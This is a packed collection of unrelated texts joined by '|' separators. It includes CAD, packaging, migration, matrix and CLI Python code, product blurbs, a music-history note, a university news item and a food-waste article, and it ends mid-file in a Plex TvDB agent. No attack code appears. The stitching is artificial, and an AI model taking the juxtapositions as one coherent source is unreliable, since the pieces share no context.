(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 10.23 - 0.3, r_2, 0),
(0.5 * 10.23, r_2 + 0.3, 0),
(0.5 * 10.23, r_3, 0),
(0.5 * 5.89, r_4, 0),
(0, r_4, 0),
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
def minivwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 8.64
r_2 = 0.5 * 9.974
r_3 = 0.5 * 12.21
r_4 = 0.5 * 15.23
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 8.8 - 0.3, r_2, 0),
(0.5 * 8.8, r_2 + 0.3, 0),
(0.5 * 8.8, r_3, 0),
(0.5 * 5.78, r_4, 0),
(0, r_4, 0),
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
|
Buddy Bunny is the perfect snuggle companion - just look at those ears! With a soft organic cotton body filled with corn fibre, she is suitable for the youngest, most delicate of skins, from birth and beyond - because let's face it, once they have had their very first cuddle, they won't ever want to let her go.
A beautiful new baby gift to treasure forever.
100% GOTS certified organic cotton with corn fibre filling. |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
args = map(lambda var, opt:
"-DENABLE_%s=%s" %
(opt, 'ON' if var in self.spec else 'OFF'),
variants,
options)
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
|
It seems Boris Vian wasn’t the only Frenchman keen on combining music and other senses. In 1922, Science and Invention featured an illustration of a scent organ inspired by perfumer and chemist Dr. Septimus Piesse’s theories about syncing scent and musical notes. When played, Piesse’s scent organ, like Vian’s pianocktail, would produce an odor (or a cocktail in Vian’s case) that corresponds to a given pattern tapped on the organ’s keys. Notorious jazzman Vian took it a step further, however, by simultaneously producing a cocktail representation of a musical tune.
We eagerly anticipate the appearance of his pianocktail in Michel Gondry’s film adaptation of Vian’s novel. Mood Indigo is slated for release in early spring 2013. |
# -*- coding: utf-8 -*-
"""
chemreac.util.banded
--------------------
this module contains functions to deal with banded matrices.
"""
from __future__ import (absolute_import, division, print_function)
import numpy as np
def get_banded(A, n, N, n_jac_diags=1, order='C', padded=False):
""" Turns a dense matrix into a banded one
Turns a dense matrix (n·N) × (n·N) into a banded matrix
including the diagonal and n super-diagonals and n sub-diagonals.
Parameters
----------
A: 2-dimensional square matrix
n: int
sub-block dimension
N: int
number of super-blocks
n_jac_diags: int
number of diagonals (default: 1)
order: {'C', 'F'}, optional
C- or Fortran-contiguous
padded: bool, optional
default: False, if True: A is padded with n rows along the top
Raises
------
ValueError on mismatch of A.shape and n*N
"""
if A.shape != (n*N, n*N):
raise ValueError("Shape of A != (n*N, n*N)")
nouter = n * n_jac_diags
B = np.zeros(((3 if padded else 2)*nouter + 1, n*N), order=order)
for ri in range(n*N):
for ci in range(max(0, ri-nouter), min(n*N, ri+nouter+1)):
B[(2 if padded else 1)*nouter+ri-ci, ci] = A[ri, ci]
return B
def get_jac_row_from_banded(J, rows, n, n_jac_diags=1):
"""
Extracts rows from a banded matrix J
Parameters
----------
J: 2-dimensional array
Source matrix with banded storage.
rows: sequence
indices of rows to extract
n: integer
row length
n_jac_diags: integer
number of diagonals (default: 1)
"""
out = np.empty((len(rows), n))
nouter = n * n_jac_diags
for ri in rows:
for ci in range(n):
out[rows.index(ri), ci] = J[nouter+ri-ci, ci]
return out
def get_dense(A, n, N, padded=False, n_jac_diags=1):
out = np.zeros((n*N, n*N))
nouter = n * n_jac_diags
diag_offset = 2*nouter if padded else nouter
for ri in range(n*N):
for ci in range(max(0, ri-nouter), min(n*N, ri+nouter+1)):
out[ri, ci] = A[diag_offset+ri-ci, ci]
return out
|
American Shifter's Neutral Safety Switch / Backup Switch Kit is designed to add a safety switch or a back up switch to your ride. It can operate one or the other but not both. Kit includes brackets, switch, and detailed instructions. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fee'
db.create_table(u'ratechecker_fee', (
('fee_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('plan', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ratechecker.Product'])),
('product_id', self.gf('django.db.models.fields.IntegerField')()),
('state_id', self.gf('localflavor.us.models.USStateField')(max_length=2)),
('lender', self.gf('django.db.models.fields.CharField')(max_length=16)),
('single_family', self.gf('django.db.models.fields.BooleanField')(default=True)),
('condo', self.gf('django.db.models.fields.BooleanField')(default=False)),
('coop', self.gf('django.db.models.fields.BooleanField')(default=False)),
('origination_dollar', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)),
('origination_percent', self.gf('django.db.models.fields.DecimalField')(max_digits=6, decimal_places=3)),
('third_party', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)),
('data_timestamp', self.gf('django.db.models.fields.DateTimeField')()),
))
db.send_create_signal(u'ratechecker', ['Fee'])
# Adding unique constraint on 'Fee', fields ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop']
db.create_unique(u'ratechecker_fee', ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'])
def backwards(self, orm):
# Removing unique constraint on 'Fee', fields ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop']
db.delete_unique(u'ratechecker_fee', ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'])
# Deleting model 'Fee'
db.delete_table(u'ratechecker_fee')
models = {
u'ratechecker.adjustment': {
'Meta': {'object_name': 'Adjustment'},
'adj_value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'affect_rate_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_fico': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'min_fico': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'prop_type': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'rule_id': ('django.db.models.fields.IntegerField', [], {}),
'state': ('localflavor.us.models.USStateField', [], {'max_length': '2', 'null': 'True'})
},
u'ratechecker.fee': {
'Meta': {'unique_together': "(('product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'),)", 'object_name': 'Fee'},
'condo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'coop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'fee_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lender': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'origination_dollar': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'origination_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'product_id': ('django.db.models.fields.IntegerField', [], {}),
'single_family': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'state_id': ('localflavor.us.models.USStateField', [], {'max_length': '2'}),
'third_party': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'})
},
u'ratechecker.product': {
'Meta': {'object_name': 'Product'},
'adj_period': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'ai_value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '4'}),
'annual_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'arm_index': ('django.db.models.fields.CharField', [], {'max_length': '96', 'null': 'True'}),
'arm_margin': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '4'}),
'condo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'coop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'institution': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'int_adj_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'int_adj_term': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'io': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'loan_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'loan_purpose': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'loan_term': ('django.db.models.fields.IntegerField', [], {}),
'loan_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'max_fico': ('django.db.models.fields.IntegerField', [], {}),
'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'min_fico': ('django.db.models.fields.IntegerField', [], {}),
'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'plan_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'pmt_type': ('django.db.models.fields.CharField', [], {'default': "'FIXED'", 'max_length': '12'}),
'single_family': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'ratechecker.rate': {
'Meta': {'object_name': 'Rate'},
'base_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'lock': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'rate_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'region_id': ('django.db.models.fields.IntegerField', [], {}),
'total_points': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'})
},
u'ratechecker.region': {
'Meta': {'object_name': 'Region'},
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'state_id': ('localflavor.us.models.USStateField', [], {'max_length': '2'})
}
}
complete_apps = ['ratechecker']
|
According to IAU public relations, Dr. Mirzadeh presented an overview of the status of IAU and acknowledged the influential role of the university's pioneers and founders, such as Ayatollah Hashemi Rafsanjani, in establishing IAU as the largest brick-and-mortar university in the world.
Mirzadeh noted that IAU takes in students in all academic fields and at all levels and currently holds a rank of 162 in the ESI database with regards to global science production. He mentioned that 68 thousand faculty members and professors are active in this university - which can be a tremendous asset for international universities interested in further cooperation. In addition to running 4 international branches, IAU has launched 3 international offices in Italy, Germany, Russia and Oman so far and plans are in order to develop its international activities.
In this meeting, Austrian ambassador Friedrich Stift stated that the Austrian government welcomes cooperation with IAU and running its office in Austria.
Stift made specific mention of medical and paramedical training cooperations, development of international relations, and scientific and technological collaboration between universities of both countries, and that the Austrian government shall support further endeavours in related fields. |
"""
Description: op platform top entrence
"""
import argparse
from utils import pcom
from conf import settings
from core import runner_admin
from core import runner_init
from core import runner_flow
from core import runner_backup
from lic.op_lic import OPClient
LOG = pcom.gen_logger(__name__)
def gen_admin_parser(subparsers):
"""to generate admin parser"""
admin_parser = subparsers.add_parser(
"admin",
help="sub cmd about kicking off project related actions")
me_group = admin_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list", dest="admin_list_proj", action="store_true",
help="toggle to list all currently available proj names")
me_group.add_argument(
"-list_lab", dest="admin_list_lab", action="store_true",
help="toggle to list all currently available lab names")
me_group.add_argument(
"-p", dest="admin_proj_name",
help="input the proj name which will be kicked off")
me_group.add_argument(
"-b", dest="admin_block_lst", nargs="+",
help="input the block names to be initialized in the specified project")
me_group.add_argument(
"-update_blk", dest="admin_update_blk", nargs="*",
help="toggle or input blocks to update blocks directory according to RELEASE directory")
me_group.add_argument(
"-list_lib", dest="admin_list_lib", action="store_true",
help="toggle to list all available lib process names")
me_group.add_argument(
"-lib", dest="admin_lib", nargs="*",
help="toggle or input lib processes to generate library mapping links and related files")
me_group.add_argument(
"-lib_type", dest="admin_lib_type", nargs="+",
help="input the lib_types, e.g. std, tech, mem, ip, io")
me_group.add_argument(
"-release_check", dest="admin_release_check", action="store_true",
help="toggle to check the block released json files")
me_group.add_argument(
"-release", dest="admin_release", action="store_true",
help="toggle to release block files")
admin_parser.set_defaults(func=main_admin)
def main_admin(args):
"""init sub cmd top function"""
runner_admin.run_admin(args)
def gen_init_parser(subparsers):
"""to generate init parser"""
init_parser = subparsers.add_parser(
"init",
help="sub cmd about generating initial project directories")
me_group = init_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list", dest="init_list_proj", action="store_true",
help="toggle to list all currently available proj names")
me_group.add_argument(
"-list_lab", dest="init_list_lab", action="store_true",
help="toggle to list all currently available lab names")
me_group.add_argument(
"-p", dest="init_proj_name",
help="input the proj name which will be check out from repository")
init_parser.add_argument(
"-b", dest="init_block_name_lst", nargs="+",
help="input the block name which will be check out from repository")
init_parser.set_defaults(func=main_init)
def main_init(args):
"""init sub cmd top function"""
runner_init.run_init(args)
def gen_flow_parser(subparsers):
"""to generate flow parser"""
flow_parser = subparsers.add_parser(
"flow",
help="sub cmd about running and controlling backend flows")
me_group = flow_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list_env", dest="flow_list_env", action="store_true",
help="toggle to list all internal environment variables")
me_group.add_argument(
"-list_blk", dest="flow_list_blk", action="store_true",
help="toggle to list all available blocks")
me_group.add_argument(
"-list_flow", dest="flow_list_flow", action="store_true",
help="toggle to list all available flows")
me_group.add_argument(
"-list_diff", dest="flow_list_diff", nargs='?', const='DEFAULT',
metavar='FLOW_NAME',
help="""toggle to demonstrate the diff between block level config/plugins
and proj level one (default: FLOW_NAME=DEFAULT)""")
me_group.add_argument(
"-init", dest="flow_init_lst", nargs="+",
help="input flow initial name list to generate flow config files")
me_group.add_argument(
"-gen", dest="flow_gen_lst", nargs="*",
help="toggle and input flows to generate flow run files")
me_group.add_argument(
"-run", dest="flow_run_lst", nargs="*",
help="toggle and input flows to run flow")
flow_parser.add_argument(
"-force", dest="flow_force", default=False, nargs="?",
help="toggle and input begin sub-stage to run force to ignore last status")
flow_parser.add_argument(
"-auto_release", dest="flow_auto_release", action="store_true",
help="for ext sub_stage auot release")
flow_parser.add_argument(
"-auto_run", dest="flow_auto_run", action="store_true",
help="for sta flow auto run")
flow_parser.add_argument(
"-begin", dest="flow_begin", default="",
help="input begin sub-stage to run")
flow_parser.add_argument(
"-end", dest="flow_end", default="",
help="input end sub_stage to run")
flow_parser.add_argument(
"-c", dest="flow_comment", default="",
help="input flow comments to be shown and distinguished with others")
me_group.add_argument(
"-show_var", dest="flow_show_var_lst", nargs="*",
help="toggle and input flows to list all variables passed to templates")
me_group.add_argument(
"-restore", dest="flow_restore", default="",
help="input flow::stage:sub-stage to restore")
me_group.add_argument(
"-release", dest="flow_release_lst", nargs="+",
help="input multiple flow::stage:sub-stage to release")
flow_parser.add_argument(
"-yes", dest="flow_cfm_yes", action="store_true",
help="toggle flows to give all yes response to flow inline prompt hint")
flow_parser.set_defaults(func=main_flow)
def main_flow(args):
"""flow sub cmd top function"""
runner_flow.run_flow(args)
def gen_backup_parser(subparsers):
"""to generate backup parser"""
backup_parser = subparsers.add_parser(
"backup",
help="sub cmd about backup project directories")
me_group = backup_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-p", dest="backup_proj_name",
help="input the proj name which to be backup by super user")
backup_parser.set_defaults(func=main_backup)
def main_backup(args):
"""backup sub cmd top function"""
runner_backup.run_backup(args)
def gen_args_top():
"""to generate top args help for op"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-v", dest="version", action="store_true",
help="show op version info and exit")
subparsers = parser.add_subparsers()
gen_admin_parser(subparsers)
gen_init_parser(subparsers)
gen_flow_parser(subparsers)
gen_backup_parser(subparsers)
return parser.parse_args()
def main():
"""op top function"""
args = gen_args_top()
if args.version:
print("OnePiece Platform Version: op 4.0.0")
return
if not settings.DEBUG:
opclient = OPClient()
opclient.set_license_server()
opclient.checkout_license()
if hasattr(args, "func"):
try:
args.func(args)
except KeyboardInterrupt:
LOG.critical("op terminated")
except SystemExit:
LOG.critical("op failed")
else:
LOG.info("op completed")
else:
LOG.critical("sub cmd is NA, please use -h to check all sub cmds")
if not settings.DEBUG:
opclient.checkin_license()
|
Best match results for bathroom basin & sink suppliers in Panania + 30km.
Find the best tradesmen, home improvement and repair professionals or suppliers for your project on HomeImprovement2day. We have listings for all the trades and suppliers you need to help you whether you are renovating, building or just need something repaired or maintained in and around your home, including bathroom basin & sink suppliers in Panania (2213).
There is no time like today to get started on those much needed renovations and repairs around your home, HomeImprovement2day has all the tradesmen, home improvement professionals and suppliers that you will need whatever the project like bathroom basin & sink suppliers in Panania (2213). Are you a home improvement business that wants to generate quality leads and increase your businesses online exposure? List your business today, for free! |
# Copyright 2014 Hewlett-Packard Company
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
endpoint_group_table = sql.Table(
'endpoint_group',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(255), nullable=False),
sql.Column('description', sql.Text, nullable=True),
sql.Column('filters', sql.Text(), nullable=False))
endpoint_group_table.create(migrate_engine, checkfirst=True)
project_endpoint_group_table = sql.Table(
'project_endpoint_group',
meta,
sql.Column('endpoint_group_id', sql.String(64),
sql.ForeignKey('endpoint_group.id'), nullable=False),
sql.Column('project_id', sql.String(64), nullable=False),
sql.PrimaryKeyConstraint('endpoint_group_id',
'project_id'))
project_endpoint_group_table.create(migrate_engine, checkfirst=True)
|
The eradication of food waste is a goal arguably more important than any other for stakeholders in food supply chains, yet, not surprisingly, it is one rarely observed in the key performance indicators (KPIs) employed by supply chain professionals or by retail operators as they strive to measure the overall success of their efforts.
There is a social and environmental urgency to eliminate food waste from supply chains and operations - in the United States alone as much as 30 percent of food, valued at roughly $48 billion, is thrown away each year. Supply chain professionals can work toward success by raising awareness about this issue through quantification and tracking of food waste.
One of the enduring mantras of management is that you can’t manage what you can’t measure, and this is equally true for food waste. One early adopter of this approach is Tesco , who has introduced transparency into its food loss reporting.
During 2013/2014, over 62,000 tons of food were wasted in Tesco stores and distribution centres in the UK. While this amount represents less than one percent of food products sold during this period, Tesco continues to work toward decreasing this amount - an objective that makes commercial as well as social sense.
Drilling deeper, Tesco has developed food waste profiles for its 25 most frequently purchased perishable products, and set in place initiatives to reduce waste associated with them.
Regardless of whether your company deems food waste as a KPI, it certainly warrants being quantified, tracked, and managed, with an eye toward reducing its environmental impact and benefitting those in need. Attention to cold chain best practices, field and packing sheds and temperature maintenance are just a few of the ways fresh produce companies can make food waste reduction a priority.
To learn more on this topic, download 3 Ways to Eradicate Food Waste and Measure Success. |
import constants, functions, lxml, logging
from functions import XMLFromURL, GetElementText
from lxml import etree
from lxml.builder import E
from lxml.etree import Element, SubElement, Comment
def ParseNoFromSeason(season, episode, default):
#if season == 0 and episode == 0:
# return "S" + str(default).zfill(2) + "E00"
#else:
return "S" + str(season).zfill(2) + "E" + str(episode).zfill(2)
class TvDB(constants.Series):
def __init__(self, id):
logging.Log_Milestone("TvDB" + "_" + id)
self.ID = id
self.MetaType = "Tvdb"
data = XMLFromURL(constants.TVDB_HTTP_API_URL % id, id + ".xml", os.path.join("TvDB", id), CACHE_1HOUR * 24).xpath("""/Data""")
if data != None:
data = data[0]
##--------------------------------Title--------------------------------##
if GetElementText(data, "Series/SeriesName"):
self.Title = str(GetElementText(data, "Series/SeriesName")).encode('utf-8').strip().translate(constants.ReplaceChars)
##--------------------------------Summary------------------------------##
if GetElementText(data, "Series/Overview"):
self.Summary = GetElementText(data, "Series/Overview")
##--------------------------------Originally_Available_At--------------##
if GetElementText(data, "Series/FirstAired"):
self.Originally_Available_At = GetElementText(data, "Series/FirstAired")
##--------------------------------Rating-------------------------------##
if GetElementText(data, "Series/Rating"):
self.Rating = GetElementText(data, "Series/Rating")
##--------------------------------Studio-------------------------------##
if GetElementText(data, "Series/Network"):
self.Studio = GetElementText(data, "Series/Network")
##--------------------------------Countries----------------------------##
##--------------------------------Genres-------------------------------##
if GetElementText(data, "Series/Genre"):
self.Genres = filter(None, GetElementText(data, "Series/Genre").split("|"))
##--------------------------------Tags---------------------------------##
##--------------------------------Collections--------------------------##
##--------------------------------Content_Rating-----------------------##
if GetElementText(data, "Series/ContentRating"):
self.Content_Rating = GetElementText(data, "Series/ContentRating")
##--------------------------------Writers------------------------------##
##--------------------------------Directors----------------------------##
##--------------------------------Producers----------------------------##
##--------------------------------Roles--------------------------------##
self.Roles = []
##--------------------------------Images-------------------------------##
banners = []
bannersXml = XMLFromURL(constants.TVDB_BANNERS_URL % id, id + "_banners.xml", os.path.join("TvDB", id), CACHE_1HOUR * 24)
if bannersXml:
art = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
art = XML.ElementFromString(art)
artCount = 2
posters = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
posters = XML.ElementFromString(posters)
postersCount = 2
banners = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
banners = XML.ElementFromString(banners)
bannersCount = 2
season = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
season = XML.ElementFromString(season)
seasonCount = []
for banner in sorted(bannersXml.xpath("./Banner"), key=lambda x: float(GetElementText(x, "Rating", 0)) , reverse=True):
bannerType = GetElementText(banner, "BannerType")
bannerType2 = GetElementText(banner, "BannerType2")
bannerPath = GetElementText(banner, "BannerPath")
bannerThumb = GetElementText(banner, "ThumbnailPath")
if bannerThumb == None or bannerThumb == "":
bannerThumb = os.path.splitext(bannerPath)[0] + '_t' + os.path.splitext(bannerPath)[1]
metatype = ("art" if bannerType == "fanart" else \
"posters" if bannerType == "poster" else \
"banners" if bannerType == "series" or bannerType2=="seasonwide" else \
"season" if bannerType == "season" and bannerType2=="680x1000" else \
"season" if bannerType == "season" and bannerType2=="season" else None)
#Log("Images: %s, %s, %s, %s, %s" % (bannerPath, constants.TVDB_IMAGES_URL, id, metatype, bannerThumb))
mainUrl, thumbUrl, mainLocalPath, thumbLocalPath = functions.ParseImage(bannerPath, constants.TVDB_IMAGES_URL, os.path.join("TvDB", id, metatype), bannerThumb)
if metatype == "art":
SubElement(art, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/fanart") else artCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
artCount = artCount + 1
if metatype == "posters":
SubElement(posters, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/poster") else postersCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
postersCount = postersCount + 1
if metatype == "banners":
SubElement(banners, "Image", id = str(1 if bannerPath == GetElementText(data, "Series/banner") else bannersCount), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
bannersCount = bannersCount + 1
if metatype == "season":
seasonCount.append(GetElementText(banner, "Season"))
SubElement(season, "Image", id = str(seasonCount.count(GetElementText(banner, "Season"))), mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath, season = str(GetElementText(banner, "Season")))
self.Art = art
self.Posters = posters
self.Banners = banners
self.Season = season
##--------------------------------Themes-------------------------------##
self.Themes = []
##--------------------------------EpisodeCount-------------------------##
self.EpisodeCount = len(data.xpath("""./Episode/SeasonNumber[text()>0]"""))
##--------------------------------SpecialCount-------------------------##
self.SpecialCount = len(data.xpath("""./Episode/SeasonNumber[text()=0]"""))
##--------------------------------Duration-----------------------------##
if GetElementText(data, "Series/Runtime"):
self.Duration = int(int(self.EpisodeCount) * int(GetElementText(data, "Series/Runtime")))
##--------------------------------OP/ED_List---------------------------##
self.OpList = []
self.EdList = []
##--------------------------------Episodes-----------------------------##
if len(data.xpath("""./Episode""")) > 0:
self.Episodes = []
for item in data.xpath("""./Episode"""):
self.Episodes.append(self.Episode(item, id))
#Log("AniDB - __init__() - Populate Title: '%s', Network: '%s', Overview: '%s', FirstAired: '%s', Genre: '%s', ContentRating: '%s', Rating: '%s', Episodes: '%s', EpisodeCount: '%s', SpecialCount: '%s', OpedCount: '%s', Posters: '%s'"
